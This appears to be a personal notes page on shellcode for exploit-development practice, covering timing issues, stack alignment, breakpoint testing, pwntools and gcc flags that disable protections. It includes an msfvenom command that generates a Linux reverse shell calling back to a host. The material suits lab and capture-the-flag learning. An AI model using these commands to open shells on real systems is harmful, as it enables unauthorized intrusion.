Shellcode

Common Problems

Don’t Send Data Too Fast

Take into account that sending data too fast might lead to unexpected results, especially in applications that were designed for slow humans.

For example, I couldn’t get a segfault to occur in Fusion 2. After I added 1 second sleeps between all the network traffic I sent, it started working 100% of the time.

Stack Alignment

https://githubmemory.com/repo/Gallopsled/pwntools/issues/1870githubmemory.com

Reference to the problem

You might be required to align the stack to 8 or 16 bytes when doing ROP chains. If your exploit is working locally but not remotely, then this is one possible cause.

Testing out shellcode

Breakpoint trick

If you’re not sure if your shellcode is being hit (for example in a regular execution environment without a debugger), then you can place a 0xCC instruction (INT3 breakpoint). When that breakpoint is hit, then you will get a message indicating that (Trace/breakpoint trap).

Though, it won't end up in dmesg. If you want it to end up in dmesg, then you can use something that causes a segfault, like pwn.asm(pwn.shellcraft.i386.crash()) from pwntools. You can also try pwn.asm(pwn.shellcraft.i386.infloop()) to create an infinite loop.

Shellcode repository

shell-storm | Shellcodes Database

But really, using msfvenom to generate your own shellcode is better in pretty much every way.

Test files

There are usually test files along with shellcode. You might need to supply additional options for gcc, like making the stack executable, etc.

gcc test.c -o test -fno-stack-protector -z execstack -no-pie

Generating Shellcode

Generating shellcode with msfvenom

You can generate shellcode for a reverse shell using msfvenom.

This is an example of an x86 linux reverse shell, which will connect back to 172.16.184.1 on port 8000. It’s set to python format, so you can paste it into python.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=8000 -a x86 --platform linux -f python

You can also assign bytes that the shellcode must not use (like NULL bytes or backslashes). This is useful if you have certain limitations.

Generating Assembly Using Pwntools

pwnlib.asm — Assembler functions — pwntools 4.8.0 documentation

Documentation

You can use pwntools to generate the machine code for whatever assembly you want to execute. For example, here is the syntax for doing relative jumps in pwntools on the command line:

pwn asm 'jmp $+0x20'

And this is how you can do it in Python code:

>>> import pwn
>>> pwn.asm('jmp $+0x20')
b'\xeb\x1e'